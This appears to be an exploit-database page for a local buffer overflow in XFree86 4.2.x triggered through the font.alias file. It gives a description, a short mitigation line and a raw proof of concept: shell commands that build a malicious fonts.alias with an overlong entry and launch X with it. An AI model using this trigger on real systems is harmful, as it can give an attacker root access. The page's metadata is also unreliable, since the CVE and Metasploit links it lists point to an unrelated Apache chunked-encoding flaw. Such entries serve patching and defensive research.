header-logo
Suggest Exploit
vendor:
X Windows System
by:
SecurityFocus
7.2
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: X Windows System
Affected Version From: XFree86 4.2.0
Affected Version To: XFree86 4.2.1
Patch Exists: YES
Related CWE: CVE-2002-0392
CPE: a:xfree86:xfree86
Metasploit: https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2002-0392/https://www.rapid7.com/db/vulnerabilities/http-apache2-chunked-transfer-int-bof/https://www.rapid7.com/db/vulnerabilities/apache-httpd-1_3_x-apache-chunked-encoding-vulnerability-cve-2002-0392/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Mac, Windows
2002

XFree86 X Windows System Local Buffer Overflow Vulnerability

It has been reported that the XFree86 X Windows system is prone to a local buffer overflow vulnerability. The issue arises from improper bounds checking when parsing the 'font.alias' file. Successful exploitation of this issue may allow an attacker to gain root privileges to the affected system.

Mitigation:

Ensure that the 'font.alias' file is properly sanitized and that the X Windows system is running the latest version of XFree86.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9652/info

It has been reported that the XFree86 X Windows system is prone to a local buffer overflow vulnerability. The issue arises from improper bounds checking when parsing the 'font.alias' file. Successful exploitation of this issue may allow an attacker to gain root privileges to the affected system.

# cat > fonts.dir <<EOF 
1
word.bdf -misc-fixed-medium-r-semicondensed--13-120-75-75-c-60-iso8859-1
EOF
# perl -e 'print "data " . "0" x 2048 . "A" x 96 . "\n"' > fonts.alias
# X :0 -fp $PWD

Navigation

Suggest Exploit

Services By CQR